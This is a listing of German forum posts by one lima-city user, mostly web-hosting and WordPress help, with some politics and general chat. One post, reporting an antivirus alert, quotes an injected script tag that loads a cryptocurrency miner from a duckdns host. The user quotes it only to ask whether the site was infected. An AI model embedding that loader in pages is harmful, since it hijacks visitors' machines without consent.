    Oh, sorry. Habe was verwechselt, dachte, dass @darvin den Thread aufgemacht hat.

    Danke an @timebandit für den Link.
  • in: Umsetzung der Datenschutzgrundverordnung

    geschrieben von mein-wunschname

    invalidenturm schrieb:
    ...
    Der Cookie-Hinweis sollte deutlich beim ersten Aufruf der Webseite zu sehen sein, und darf nicht so eingebunden werden, dass dieser Pflichtangaben wie zum Beispiel den Link zum Impressum verdeckt. Einen Cookie-Hinweis Generator gibt es (kostenlos+open source) hier https://cookieconsent.insites.com/download/



    Bei einem WordPress-Blog ist es aber sicher günstiger, ein Plugin zu nehmen, z.B. WP Cookie Choice
  • in: Wordpress Bilder zu groß

    geschrieben von mein-wunschname

    Das sieht ganz so aus, als ob beim Einfügen des Bildes über Medien hinzufügen die Option vollständige Größe gewählt wurde.
  • in: Keine Themes mit Wordpress

    geschrieben von mein-wunschname

    Habe jetzt eine Antwort auf mein Ticket erhalten. Das Problem sollte jetzt behoben sein. habe bei mir getestet. Die beschriebenen Probleme sind weg.
  • in: Keine Themes mit Wordpress

    geschrieben von mein-wunschname

    Ich habe jetzt einmal ein Ticket aufgemacht.
  • in: Umsetzung der Datenschutzgrundverordnung

    geschrieben von mein-wunschname

    @horstexplorer: Ja, das habe ich auch gleich gesehen. Man erkennt daraus auch schnell, es eigentlich generell um eine ganz andere Zielgruppe geht. Ich werde mir da etwas generieren lassen und dann noch individuell anpassen.
  • in: Keine Themes mit Wordpress

    geschrieben von mein-wunschname

    horstexplorer schrieb:
    Ist vielleicht falsch aber:

    Wenn die Installation bereits 5 Jahre her ist und keine wirklichen Updates dabei waren kann es doch sein, dass keine Themes/Updates mehr für diese Version oder diesen Verbreitungsweg bereit gestellt werden.
    Weil Connection Timeout klingt so wie gibt es nicht (mehr)


    Ja, das ist falsch. Mein WP-Installation ist ansonsten in allen Punkten aktuell und wird regelmäßig gepflegt.

    Das gleiche problem habe ich auch bei einer Testinstallation hier bei LC, die ich in 12/2017 aufgesetzt habe.

    @invalidenturm: Möglicherweise sind wir nicht auf dem gleichen Server, bei mir wird
    Server Hostname : 4f8583d7822e

    angezeigt.
  • in: Umsetzung der Datenschutzgrundverordnung

    geschrieben von mein-wunschname

    Ich finde die Anforderungen für kleine Webseitenbetreiber zwar auch ziemlich besch..., aber was soll man machen.
    Hier
    https://dsgvo-muster-datenschutzerklaerung.dg-datenschutz.de/
    gibt es einen Generator, von dem heise online meint:
    https://www.heise.de/ix/meldung/Datenschutzgrundverordnung-Neue-Abmahngefahren-fuer-Websites-3936980.html
    dass er an die neue DS-GVO angepasst ist.
  • in: Keine Themes mit Wordpress

    geschrieben von mein-wunschname

    Anscheinend läuft tatsächlich irgendetwas nicht rund. Ich habe hier ein WP, das schon seit 5 Jahren läuft. Habe mich gerade einmal eingeloggt, sehe 1 Update, nur eine Sprachdatei. Das Update geht aber nicht durch es kommt die Meldung
    Download fehlgeschlagen. cURL error 28: Connection timed out after 10000 milliseconds


    Beim Versuch, die Theme-Übersicht anzuzeigen (bei Themes hinzufügen) kommt die Meldung:
    Ein unerwarteter Fehler ist aufgetreten. Es scheint etwas bei WordPress.org oder mit dieser Serverkonfiguration nicht zu stimmen. Sollte das Problem weiter bestehen, nutze bitte die Support-Foren.

    Analog die Meldung bei Plugins.

    bei einer anderen WP-Installation, die nicht bei Lima-City liegt habe ich diese Probleme nicht. Sieht also stark nach einem Probelm bei LC aus.

    Edit: Habe bei LC einen kostenlosen Account.
  • in: geblockter Inhalt, nur sichere Seiten werden angezeigt

    geschrieben von mein-wunschname

    liebesbruecke schrieb:
    ... Oder gibt es in nächster Zeit die Möglichkeit bei lima-city html5-Videos hochzuladen?
    Gruß
    Wilfried


    Ich glaube nicht, dass Lima-City da etwas ändern wird. Bei einem Free-Account sind so lange ich Lima-City kenne bestimmte Dateiformate (Audio, Video) nicht zugelassen
  • in: Bilder auf der Webseite einbinden

    geschrieben von mein-wunschname

    Die Anmerkungen zu WordPress sind natürlich vollkommen richtig, auch andere CMS habe ihre innere Logik. Bei WP z.B. erstellt ja das System bei konventioneller Nutzung sämtliche Angaben.
    Der TE schrieb aber
    Mit dem eingebauten ftp Programm kann ich eine Internetseite und ein Bild hochladen.

    Das ist dann für die Nutzung von WP eher untypisch.
  • in: Bilder auf der Webseite einbinden

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    naja der Pfad sollte schon mit angegeben werden:

    <img src="https://DeineAdresse.de/Verzeichnis auf dem Webspace/Bildname.jpg" oder auch anderes Bildformat


    Warum?

    src (engl. source für Quelle) für die Referenz der Bilddatei. Diese kann wie in HTML üblich relativ oder absolut angegeben werden.


    Lima-City referenziert die von mir heiß geliebten Schneeflocken ja auch nicht mit
    https://www.lima-city.de/images/layout/pixel.png

    sondern nur mit
    images/layout/pixel.png


    Bildname.jpg ohne weitere Angaben ist eine relative Angabe, die besagt, dass sich die Bilddatei im gleichen Verzeichnis befindet wie die HTML-Datei.
  • in: Flocken

    geschrieben von mein-wunschname

    Mir ist es ziemlich egal, wo das Thema steht. Mich erinnern solche Scripte an die Internet-Steinzeit. Da bin ich Lima zutiefst dankbar, dass mir ein Zauberstab-mouse-follower hier erspart bleibt.
    Was soll's. Mit Lima-City back to the roots.
    Übrigens: Frühling ist trotzdem!!!
  • in: Flocken

    geschrieben von mein-wunschname

    Was habe ich eigentlich verbrochen, dass ich mir immerzu diese Schneeflocken ansehen muss?
  • in: Bei Websiteaufruf per WLAN Weiterleitung

    geschrieben von mein-wunschname

    darvin schrieb:
    ...

    Aber das Problem mit der Website ist nicht mehr da.


    Was hast du denn konkret gemacht um das Problem zu lösen?
  • in: Bei Websiteaufruf per WLAN Weiterleitung

    geschrieben von mein-wunschname

    Mein Browser sagt:
    Diese Website ist nicht erreichbar
    Die Server-IP-Adresse von www.antsarea.eu wurde nicht gefunden.
    Auf Google nach antsarea eu suchen
    ERR_NAME_NOT_RESOLVED
  • in: Wordpress Theme Finder

    geschrieben von mein-wunschname

    Die Absicht, so ein Tool bereitzustellen ist sehr lobenswert, aber der Nutzen ist nach meinem Eindruck ziemlich gering.

    Wenn jemand wenig Erfahrung mit der Umsetzung von Webseiten hat, dann findet er/sie gar nicht erst heraus, dass es sich um eine Wordpress-Website handelt (es sei denn, jemand lässt "Stolz präsentiert von.." stehen).

    Wenn man aber in der Lage ist, mittels Blick in den Quellcode herauszufinden, dass es eine WP-Website ist, dann dürfte er dort auch herausfinden, welches Theme genutzt wird.

    Außerdem hilft oft auch die Aussage zum genutzten Theme nicht weiter, weil durch die Nutzung von Plugins die Optik noch einmal stark verändert wird.
  • in: Die Menschen in 3000 Jahren (Evolution)

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    darvin schrieb:
    @nikoklaus Ja, hast ja Recht. Aber menschenähnliche Wesen schon. Damit ist ja auch die Entwicklung des Menschen mit innen begriffen, wie ich bereits gesagt habe.
    Statt Fell Kleidung etc.


    Also ich hab in der Schule gelernt das es den Menschen ( inklusive der menschenähnlichen Vorindividuen ) seit etwa 1 Mio Jahre gibt!


    An so eine Aussage kann ich mich auch gut erinnern. In den letzten 20-30 Jahren haben aber neue Fossilienfunde und neue Untersuchungsmethoden dazu beigetragen, dass frühere Hypothesen zur Entwicklung des modernen Menschen und seiner Vorfahren revidiert wurden.
  • in: Sauberes Programmieren bei zahlreichen Unterseiten

    geschrieben von mein-wunschname

    Ich persönlich bin der Auffassung, dass man mindestens langfristig mit einer sauberen Trennung von Design und Inhalt besser fährt. Ich würde dir empfehlen, wenigsten mal testweise einen Blick auf ein CMS wie Wordpress oder Joomla (um mal zwei sehr verbreitete zu nehmen) zu werfen.
  • in: Jugendreise

    geschrieben von mein-wunschname

    Meine Eindrücke stammen aus den Jahren 2002-04.
  • in: Jugendreise

    geschrieben von mein-wunschname

    Ich habe mal eine Zeit lang bei einem auf Jugendreisen spezialisierten Reiseveranstalter gearbeitet. Obwohl das nicht mein eigentlicher Job war musste ich in Hochzeiten oder wenn es Krankheitsausfälle gab, auch mal selbst Jugendliche bespaßen.
    Ich kann also nicht direkt von eigenen Erfahrungen sprechen, eher von eigenen Beobachtungen.
    a) sehr viel hängt von den Betreuern vor Ort ab. Deren Bezahlung ist in der Regel sehr schlecht. Es gibt aber durchaus Leute, die die geborenen Animateure sind. Dann geht auch mal die Post ab.
    b) Jugendliche im Alter 16+ sind tendenziell eher gelangweit bei solchen Reisen
    c) manchmal fädeln Cliquen (oder Pärchen) die Sache so ein, dass sie eine gemeinsame Reise machen ohne das die Eltern das mitbekommen. Die haben dann garantiert ihren Spaß.

    @horstexplorer hat natürlich nicht unrecht mit seinem Hinweis. Ich habe aber auch schon selbst Teilnehmer oder Eltern animiert, Kurzkommentare mit Bewertungen abzugeben. Natürlich nur die zufriedenen. Daher denke ich, dass gute Bewertungen keine Garantie sind.
  • in: Kennt jemand den Postillion?

    geschrieben von mein-wunschname

    Ich auch.
    Fülltext Fülltext
  • in: Es war Schulz, wird die GroKo kommen?

    geschrieben von mein-wunschname

    invalidenturm schrieb:
    mein-wunschname schrieb:...Mein Fazit: so ein Job/Leben wäre einfach nicht mein Ding. Wer sich das freiwillig antut, dem bringe ich erst einmal einen gewissen Respekt entgegen (egal welche Partei).
    8.117 Euro im Monat Diäten, und eine recht gute Altersversorgung (nach zehn Mandatsjahren 1100 Euro, nach 20 Jahren 1800 Euro bzw. wenn schon länger ansässig und zu Staatspension berechtigt nach zehn Mandatsjahren 1700 Euro, nach 22 Jahren 4000 Euro), also ich würde tauschen...


    Die Bedingungen waren auch vor 28 Jahren schon günstig, da hättest du einsteigen können. Politiker kann in D jeder werden. das wird nicht unbedingt vererbt.

    Das Niveau der Diäten entspricht übrigens ungefähr dem, was große Anwaltskanzleien Berufseinsteigern anbieten; vorausgesetzt man hat das 2. Staatsexamen in der Nähe von 1,0 abgeschlossen.

    Für mich gilt in beiden Fällen: ich möchte nicht tauschen, denn auch diese Art zu arbeiten und zu leben hat ihren Preis. Das kann man doch in dem Video, das ich verlinkt habe erkennen, zumindest wenn man sich mal diese ganzen Gesichter etwas genauer anschaut.
  • in: Es war Schulz, wird die GroKo kommen?

    geschrieben von mein-wunschname

    mukerbude schrieb:
    Eine zum Ausgang der italienischen Wahl befragte Passantin sagte:
    “Menschen, die für ein RegierungsAmt kandidiert haben und an die Macht gekommen sind, sind sie alle gleich.“
    Ganz nach dem Motto: “Gib einem Menschen Macht und er wird sie missbrauchen.“


    In gewissem Maße gebe ich der Frau recht (allerdings darf man nicht vergessen, wie so etwas läuft, nämlich: ein Journalist läuft durch die Straße und spricht 15 Leute an und von den Antworten wählt er die 3 oder 5 aus, die in das Bild passen, das er vermitteln will).

    Aber was ist denn überhaupt die Alternative? Abschaffung aller Regierungen? Totale Begrenzung von Amtszeiten?

    Es gibt übrigens 2 Interessante Dokumentarfilme über einen Politiker der 3.Liga:
    - Herr Wichmann von der CDU
    - Herr Wichmann aus der dritten Reihe

    Den 2. gibt es komplett bei YT, vom ersten nur einen Trailer, habe ich aber mal im TV gesehen. Mein Fazit: so ein Job/Leben wäre einfach nicht mein Ding. Wer sich das freiwillig antut, dem bringe ich erst einmal einen gewissen Respekt entgegen (egal welche Partei).

  • in: Crowdfunding SEALAND

    geschrieben von mein-wunschname

    Hallo Lima-Gemeinde,
    das ist kein Thread in eigener Sache sondern für einen guten Freund. Der macht Animationsfilme. Einen seiner früheren Filme kann man hier

    https://vimeo.com/146820054
    sehen.
    Das neue Projekt wird wohl etwas aufwendiger. Nachdem die Mittel aus schmalen Fördertöpfen aufgebraucht sind, hat das Film-Team eine Crowdfunding-Campagne gestartet. Vielleicht findet sich ja hier der eine oder andere, der dieses Projekt unterstützen möchte. Einfach mal auf den Link unten klicken
    https://www.startnext.com/sealand

    Ganz nebenbei würde mich interessieren, was ihr von solchen Formen der Projektfinanzierung haltet. Ich selbst habe zum ersten Mal auf diesem Wege Geld für etwas gegeben.
  • in: Virus JS:Miner-C

    geschrieben von mein-wunschname

    Ca. 72h nachdem ich den Betreiber auf die von seiner Website ausgehende Virenbedrohung aufmerksam gemacht habe wurde das nun entfernt.
    @invalidenturm: dein Hinweis ist interessant. Allerdings handelt es sich wirklich eine etwas größere Firma, die einzelnen Supportmitarbeiter werden die Interna nicht kennen.
    Da nun klar ist, dass nicht mein PC sondern die Website der Verursacher ist kann der thread meinetwegen geschlossen werden.
  • in: Virus JS:Miner-C

    geschrieben von mein-wunschname

    Beim Aufruf einer bestimmten Website meldet mein Virenschutz von AVG, dass eine Bedrohung durch den Virus JS:Miner-C gesichert wurde.

    https://www.dropbox.com/s/ikr51cw6ceryttw/virus-screenshot.jpg?dl=0

    Ich habe daraufhin den Betreiber der Website informiert. Der meint, mein PC sei infiziert. Im Quellcode der Seite (Adresse kann ich hier nicht nennen, da ich dort beruflich unterwegs bin und die Seite ohnehin nur nach Anmeldung aufrufbar ist) finde ich die Zeile:

    <script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>

    Das scheint ganz offensichtlich der Aufruf des Schädlings zu sein. Im Internet findet man bei entsprechender Suche noch andere Seiten, die so infiziert sind. Auf solchen Seiten und nur dort macht mein Virenschutz Alarm.
    Trotzdem verunsichert mich die Aussage des Seitenbetreibers. Ich habe natürlich schon mal eine Scan mit AVG und auch Malwarebyte gemacht, brachte aber keine Ergebnisse.

    Was meint ihr zu dieser Sache?
  • in: MySQL löschen mit LIKE

    geschrieben von mein-wunschname

    Oja,
    DELETE FROM `wp_options` WHERE `option_name` LIKE '%woocommerce%'

    geht besser.
  • in: MySQL löschen mit LIKE

    geschrieben von mein-wunschname

    Ich will in der Wordpresstabelle wp_options alle Datensatzleichen löschen die woocommerce enthalten, aber
    DELETE FROM `wp_options` WHERE `option_name` LIKE '%{$woocommerce}%'

    liefert 0 Datensätze.
    Ich sehe nicht, was da falsch ist
  • in: Tipps um Webseite zu optimieren

    geschrieben von mein-wunschname

    Besonders schwierig ist die Suchmaschinenoptimierung bei Inhalten, die schon zig Mal im Netz zu finden sind. Interessant an der genannten suchmaschinenoptimierten Website finde ich, dass sich in nahezu allen Beiträgen genau ein Link zu einer Unternehmenswebsite befindet. Ein Schelm, wer arges dabei denkt.

  • in: MP3 in Wordpress

    geschrieben von mein-wunschname

    Ja, an Youtube habe ich auch schon gedacht, aber wenn Song oder Titelbild ausgetauscht werden sollen, dann fängt wieder jemand an, Videos zu basteln. Es geht immerhin um 25 Bilder/Song. Außerdem gibt es auch noch organisatorische Probleme (will niemand auf seinem Account haben).

    Ich habe die Angelegenheit jetzt weitgehend "zu Fuss" gelöst. Man kann sich das hier auf einer Testwebsite ansehen:https://salto.9f8.de/(unter Repertoire). Wer Lust hat kann ja mal draufsehen. Der Wechsel bei :hover soll noch mit einer transition gemacht werden, eventuell auch mit css-Filtern.

    Eine Angelegenheit konnte ich aber nicht lösen. Eigentlich soll jedes 2.Quadrat eine andere Einfärbung haben. Die einzelnen Quadrate haben div, der so aussieht:
    <div class="mediabackground">

    Jetzt habe ich gedacht, dass ich mit
    .mediabackground:nth-child(2n+1)

    jedes 2. Element ansprechend kann und anders einfärben kann. Klappt aber nicht, es werden immer alle divs mit der Klasse mediabackground geändert.

    Möglicherweise hat dazu jemand einen Tipp. Auch sonst bin ich für Hinweise dankbar.
  • in: MP3 in Wordpress

    geschrieben von mein-wunschname

    Die Sache mit den Portfolio-Plugins sieht interessant aus. Das werde ich mir einmal näher ansehen.
  • in: MP3 in Wordpress

    geschrieben von mein-wunschname

    Danke ersteinmal für den Link.
    Ich habe inzwischen herausbekommen, woher die Chorleute die Idee haben. Hier
    http://mightymondays.de/#pg-18-4
    unter Repertoire wird so etwas ansatzweise gezeigt. Diese einzelnen Quadrate und dem mouseover-Effekt mit dem Text drauf werden vermutlich über ein spezielles Plugin erzeugt. Wenn ich die habe, könnte ich probieren, einen MP3-Player darauf zu legen.
    Eventuell weiß ja jemand, was das für ein Plugin ist
  • in: Wordpress Designe Erstellen

    geschrieben von mein-wunschname

    Das sieht ja schon ziemlich aufwendig aus, der Einbau bei und die Anpassung an WordPress macht bestimmt viel Arbeit.

    Es gibt hier
    https://www.musegain.com/musexpress/

    einen Anbieter, der verspricht, dass man mit dem MusexPress CMS solche Adobe Muse Templates verwenden kann, wobei es sich eigentlich nicht um ein eigenes CMS handelt, sondern um ein Plugin für WordPress. Angeblich soll das auch kostenlos sein. Ob es tatsächlich und ohne Einschränkungen so ist kann ich nicht beurteilen.
  • in: MP3 in Wordpress

    geschrieben von mein-wunschname

    Die ambitionierten Sänger des Chores, dem ich eng verbunden bin, wollen, dass ihre WordPress Website aufgepeppt wird. Es geht darum, auf der Startseite die Chormitglieder vorzustellen. Zu jedem Mitglied gibt es zwei Bilder, ein normal, das 2. wird bei mouseover angezeigt. Gleichzeitig soll bei mouseover ein Player angezeigt werden bei dem man eine Soundwiedergabe starten kann.

    Ich will das Fahrrad nicht vollkommen neu erfinden und habe mir gedacht, dass ich auf einem bereits existierenden Plugin aufbaue. Allerdings werden mir beim Durchsuchen der Plugins in Wordpress knapp 200 Plugins angeboten, die alle was mit MP3-Player zu tun haben. Daher meine Frage, ob jemand so etwas ähnliches schon mal gemacht hat und ob es eine Empfehlung gibt, welches Plugin sich möglichst gut für mein Vorhaben eignet.
  • in: Wordpress Designe Erstellen

    geschrieben von mein-wunschname

    Möglicherweise musst da gar nicht ein komplette Theme vollkommen neu und zu Fuß erstellen. Man kann bei den einzelnen Themes ja
    1. mit dem Customizer des jeweiligen Themes viele Dinge anpassen
    2. weitere Dinge anpassen, in dem man eigenen CSS-Code einfügt (es gibt meist hierzu auch eine Einstellung im Customizer)

    Wenn du das machst, dann empfehle ich dir mit einem sogenannten Child Theme zu arbeiten (mehr dazu hier
    https://die-netzialisten.de/wordpress/anleitung-childtheme-anlegen-update/)

    Zum genauen Vorgehen müsste man aber wissen, um welche Vorlage es geht.
  • in: Google Analytics IP-Adressen anonymisieren

    geschrieben von mein-wunschname

    Die Suche bei Lima geht zurzeit tatsächlich nicht, aber die direkt bei Google und Co geht. Sie spuckt unter anderem aus:
    Seit dem 25. Mai 2010 stellt Analytics die Funktion _anonymizelp in der JavaScript-Bibliothek ga.js (und seit kürzerem ga('set', 'anonymizeIp', true) in der Bibliothek analytics.js) zur Verfügung, um Websiteinhabern die Möglichkeit zu bieten, alle IP-Adressen ihrer Nutzer innerhalb des Produkts zu anonymisieren.

    Gefunden habe ich das hier
    https://support.google.com/analytics/answer/2763052?hl=de
    Dort stehen dann auch weiterführende Infos.
  • in: BER wird 2017 vermutlich nicht fertig.

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    Naja wir haben es doch! Erstaunlich, das von den Mehrkosten keine Rede ist. Und die Herren Aufsichtsräte etc. haben ihre Scherflein ja im Trockenen!


    Naja, im Vergleich zur privaten Wirtschaft ist das wohl eher mäßig. Bei Leuten, die auf Grund ihres Amtes in einem AR sitzen gibt es normalerweise Sonderegelungen, so dass sie nur die Sitzungsgelder selbst bekommen.


    turmfalken-nikolai schrieb:
    Naja wir haben es doch! Erstaunlich, das von den Mehrkosten keine Rede ist. Und die Herren Aufsichtsräte etc. haben ihre Scherflein ja im Trockenen! Naja wenigstens hatten einige tausend Bauarbeiter in der Zeit Arbeit und mußten nicht von Hartz IV leben. Gut für die Arbeitslosenstatistik und ein Teil der Kosten ist ja in Form von Lohn- und Einkommenssteuern auch wieder zurückgeflossen :biggrin:


    Meine volle Zustimmung, allerdings mit dem Hinweis, dass viele der Bauarbeiter dort anderenfalls gar kein HartzIV bekämen.
  • in: links im frame öffnen

    geschrieben von mein-wunschname

    Mal angenommen, deine Website ist so aufgebaut, dass es zwei Frames gibt:
    a) navigation - dort steht immer die Navigation drin
    b) inhalt - dort stehen immer die wechselnden Inhalte drin
    dann öffnet ein Link wie
    <a href="inhaltseite1.html" target="inhalt">Seite 1</a>
    <a href="inhaltseite2.html" target="inhalt">Seite 2</a>

    Wichtig ist also target="ziel".
    Noch wichtiger: Es ist eine hoffnungslos veraltete Technik, Webseiten mit Hilfe von Frames zu gestalten (mit einigen wenigen Ausnahmen). Möglicherweise solltest du das mal überdenken.
  • in: Bitcoin kaufen

    geschrieben von mein-wunschname

    Ich habe vor ein paar Tagen mal irgendwo gelesen, dass für das Mining der diversen Cryptowährungen (sollen ja schon über 1000 sein - wer braucht die alle) aktuell soviel Strom verbraten wird wie Irland verbraucht.
    Kennt jemand die Angaben, wieviel Strom man aktuell benötigt um 1 BC zu generieren.
  • in: Website für Handys tauglich machen ?

    geschrieben von mein-wunschname

    Threads und Postings die in diesem Forum eröffnet/gepostet werden, sollen:

    -- möglichst direkt mit Homepages zu tun haben

    -- die eigene Meinung oder Erfahrungen des Threaderöffners mit einbringen.

    -- Fragen, die im Eröffnungspost gestellt werden, möglichst ausführlich beantworten und mit eigener Meinung oder Erfahrung versehen sein

    -- eine Diskussionsgrundlage besitzen und nicht Dinge bloß dahinstellen
  • in: Tipps um Webseite zu optimieren

    geschrieben von mein-wunschname

    In diesem Beitrag
    https://www.lima-city.de/thread/eigenes-wordpress-theme-hochladen/page%3A0/perpage%3A50#1177507
    warst du ja noch ganz zufrieden mit deinem externen Dienstleister und hast ihn auch gleich noch verlinkt.

    Du müsstest schon mal konkret schreiben, was "nicht so läuft" und wie das "auf Vordermann bringen" aussehen soll, sonst liest sich das ganze so wie Gulden betteln.
    Suchmaschinenoptimierung - ja die gibt es. Hast du schon erste Grundlagen dazu gelesen, z.B. hier
    https://de.wikipedia.org/wiki/Suchmaschinenoptimierung#Arbeitsweise
    ?
  • in: Problem beim Einbinden eines Videos

    geschrieben von mein-wunschname

    Das ist eigenartig, denn sowohl FF als auch Chrome spielen das Video bei einem Direktaufruf ab. Ich habe auch mal eine Probe gemacht und auf einer Testseite type="video/webm" eingefügt. Brachte aber keinen Erfolg.
    Schick das doch mal durch einen Konverter und mach mp4 draus.
  • in: Python sinvoll?

    geschrieben von mein-wunschname

    Neben den hier genannten Anwendungsfällen für Python möchte ich noch ergänzen, dass eine ganze Reihe von Programmen Python nutzen, ohne das Otto Normal Nutzer davon viel mitbekommt. Meist sind es Programme, die für unterschiedliche Betriebssystem Plattformen exsitieren. So auf Anhieb fallen mit GIMP, Blender und InkScape ein.

    OT:
    horstexplorer schrieb:
    //Notiz

    Da der Threadersteller am selbigen Tag weitere Themen nach gleichem Schema erstellt hat mit ähnlichem Aufbau, liegt es nahe daß er nicht an der Lösung den Problems, sondern an den Gulden für eine DB interessiert ist.


    Aktuell hat @diecreator nur ein Thema erstellt.

  • in: Internetzugang von mir und meinen Eltern verbinden

    geschrieben von mein-wunschname

    Die beiden effizientesten Lösungen wurde ja schon vorgeschlagen. Ich habe hier:
    https://www.heise.de/download/blog/Teamviewer-vs-Chrome-Remote-Desktop-3251302
    noch einen Artikel gefunden, in dem die beiden Lösungen gegenübergestellt werden.
    Ich persönlich würde immer eine Lösung ohne Google bevorzugen.
  • in: Nach ankleben Style-Eigenschaften ändern

    geschrieben von mein-wunschname

    Ich verstehe nicht, warum dir jemand -1 gibt aber egal.
    Hast du dir das von mir verlinkte Beispiel mal angesehen?
    https://developers.google.com/web/updates/2017/09/sticky-headers
    Das müsst sich doch für deine Zwecke anpassen lassen
  • in: Nach ankleben Style-Eigenschaften ändern

    geschrieben von mein-wunschname

    Vor der Geburt von sticky in CSS wurde dieses Ankleben komplett mit JavaScript gelöst. Da war es dann auch einfach, gleich eine Eigenschaftsänderung einzubauen.
    Jetzt kommst du aber auch nicht um JavaScript herum. Ich habe sogar ein Beispiel gefunden, das du relativ leicht anpassen kannst. Du findest es hier
    https://developers.google.com/web/updates/2017/09/sticky-headers

    Sowohl die CSS-Eigenschaft sticky wie auch die JavaScript-Reaktion mit Hilfe von IntersectionObserver sind aber relativ neue Dinge, so dass es immer sein kann, dass Nutzer, die mit etwas älteren Browsern unterwegs sind, davon nichts mitbekommen.
  • in: MySQL Tabellen

    geschrieben von mein-wunschname

    "Gewöhnlicher " Webspace und Platz für MySQL-Datenbanken wird immer getrennt betrachtet, zumindest bei allen kostenpflichtigen bzw. kostenlosen Anbietern, die ich kenne (nur bei einem vServer zählt einfach alles, was auf der Platte ist).
  • in: Bitcoin kaufen

    geschrieben von mein-wunschname

    OOT:
    fussballturnier schrieb:
    ...Der Threadersteller hat da sicher auch schon den Faden verloren bestimmt :D


    Der Threadersteller hat das Thema rd. 20 Minuten nach seiner Erstanmeldung eröffnet und sich dann nie wieder zur Diskussion gemeldet. Zuletzt online bei Lima war er vor 6 Wochen. Ich glaube nicht, dass die Frage ernst gemeint war.
  • in: Zeilenumbruch in einem <select>

    geschrieben von mein-wunschname

    Leider hast du keinen Link zu deinem Projekt und ich bin zu faul, mir ein entsprechendes Formular zusammen zu bauen. Testen würde ich ob
    -moz-hyphens: auto;
    -o-hyphens: auto;
    -webkit-hyphens: auto;
    -ms-hyphens: auto;
    hyphens: auto;

    sich im Formularfeld auswirken.
    Ziemlich häufig kommt außerdem beim responsiven Design, z.B. wenn es um breite Tabellen geht,
    overflow: auto;

    zum Einsatz, so dass man, falls notwendig nur das Formular seitlich scrollt.
    Möglicherweise musst aber auch noch mal die komplette Formulargestaltung überdenken. Ein paar nette Anregungen zum responsiven Formulardesign gibt es hier:
    https://www.mediaevent.de/responsive-formulare/
  • in: Digitale Langzeitarchivierung

    geschrieben von mein-wunschname

    @horstexplorer und @webfreclan: Habt ihr denn in eurer Clowd bzw. auf eurer NAS Daten, die 10 Jahre alt sind oder älter? Mir geht es nicht um die Sicherung aktueller Daten sondern um Langzeitarchivierung.
    Im Verlauf meiner "Laufbahn" als Computernutzer habe ich diverse Medien durch: Kasetten am Audioeingang, Disketten diverse Größen, Streamer am Parallel-Port, Zip-Drive; bei jedem Systemwechsel habe ich diverse Medien kopiert.
    Im Unterschied dazu haben das Hochzeitfoto meiner Urgroßeltern ( 130 Jahre alt) und die Kindheitsbilder meiner Großmutter (ca. 95 Jahre alt) die langen Zeiträume ohne großen Aufwand überstanden.
  • in: Digitale Langzeitarchivierung

    geschrieben von mein-wunschname

    Ich bin gerade dabei, meine Sammlung selbst gebrannter CD/DVD durchzusehen und stelle dabei fest, dass ich vieles entsorgen kann. In einigen Fällen interessiert mich aber doch der genaue Inhalt und so habe ich nun schon in 2 Fällen festgestellt, dass ich auf die Daten teilweise nicht mehr zugreifen kann. In beiden Fällen handelt es sich um DVD, die ich im Sommer 2007 gebrannt habe.
    Ich kann mich jetzt nicht mehr erinnern, ob ich damals durch Zurückkopieren der Dateien getestet habe, ob die DVD wirklich funktioniert. Im konkreten Fall sind die Daten auch nicht so wichtig. Trotzdem taucht bei mir jetzt die Frage auf, wie sicher meine digitalen Sicherungen auf lange Sicht sind.
    Wie macht ihr das mit digitalen Dokumenten / Daten, von denen ihr meint, ihr könntet die auch in 5-10 Jahren noch brauchen?
  • in: Was macht man heuer mit Gebrauchten?

    geschrieben von mein-wunschname

    Ich habe Anfang des Jahres in Ägypten eine Prepaid Karte gekauft. Das hat etwa 45 Minuten gedauert, weil sämtliche Angaben meines Passes mühsam ins arabische Alphabet transkribiert wurden. Außerdem gab es längere Diskussionen bzgl. meiner Adressangabe, denn man war sich nicht einig, ob die Adresse in Kairo oder die in Deutschland verwendet wurde.
    Auch sonst geht es dort mehr zur Sache was tatsächlichen oder vermeintlichen Terrorschutz betrifft. Jede Tasche wird beim Betreten einer U-Bahn-Station oder eines Bahnhofes gescannt.
    In Bezug auf die Wirksamkeit all dieser maßnahmen habe ich aber eher meine Zweifel. Oft habe ich den Eindruck, dass man eher auf das Sicherheitsgefühl bedacht ist.
  • in: Googel Search Console - Sicherheitsprobleme

    geschrieben von mein-wunschname

    Naja, mit dem Browser hat das nichts zu tun, ist ja eine Nachricht, die Google generiert hat.
    Komischerweise sind aber heute alle diese Nachrichten wieder weg. Entweder war das ein Experiment oder ein Fehler bei Google.
  • in: Googel Search Console - Sicherheitsprobleme

    geschrieben von mein-wunschname

    Heute habe ich festgestellt, dass in der Search Console zu mehreren Websites Sicherheitsprobleme angezeigt werden (rotes Ausrufezeichen). Ich habe zuerst einen Schreck bekommen, da auch Websites dabei sind, die auf einem vServer laufen, dachte der wäre gehackt.
    Ich habe dann festgestellt, dass es auf dem vServer keine Vorfälle gab und dass auch Websites mit reinem HTML (+ CSS und minimalistischem JavaScript) betroffen sind. Wenn man sich dann in der Search Console informieren will, was eigentlich los ist, dann bekommt man die Nachricht:
    Ungewöhnliche Downloads
    Bei einigen oder allen Downloads auf dieser Website werden Warnungen wegen ungewöhnlicher Downloads angezeigt.

    Die Datei, die man sich mit "Alle Beispiele herunterladen" herunterladen kann ist aber leer und es werden auch keine Beispiel-Urls angezeigt.

    Kennt jemand diese Art von Nachrichten? Wenn ja, was habt ihr getan?
  • in: E-Mail Adresse schützen

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    also ich habe das mit Hilfe dieser Website gelöst: http://scr.im/

    Ob es das Nonplusultra ist weiß ich auch nicht aber es ist eine Möglichkeit!

    Für Facebook oder ähnliche Dinge ist das vermutlich ok, für das Impressum vermutlich nicht, denn wenn man diese Möglichkeit nutzt, dann wird man auf eine vollkommen andere Website weitergeleitet (die selbst wiederum kein Impressum hat) Warum soll ich dieser Website vertrauen?

    Ich bekomme pro Tag ca. 10-15 E-Mails an eine Adresse, die ich ausschließlich in Impressums nutze. Die Mails landen dann zu mehr als 99% automatisch im Spam-Ordner. 1 x am Tag bekomme ich dann eine Nachricht mit einer Kurzübersicht (Betreff und Absender) der neuen Nachrichten im Spamordner und kann bei Bedarf auch mal eine Nachricht rausholen. Das kommt aber extrem selten vor.

    Trotzdem wäre ich auch daran interessiert zu hören, wie es andere machen!
  • in: Webspace ist voll 10 GB

    geschrieben von mein-wunschname

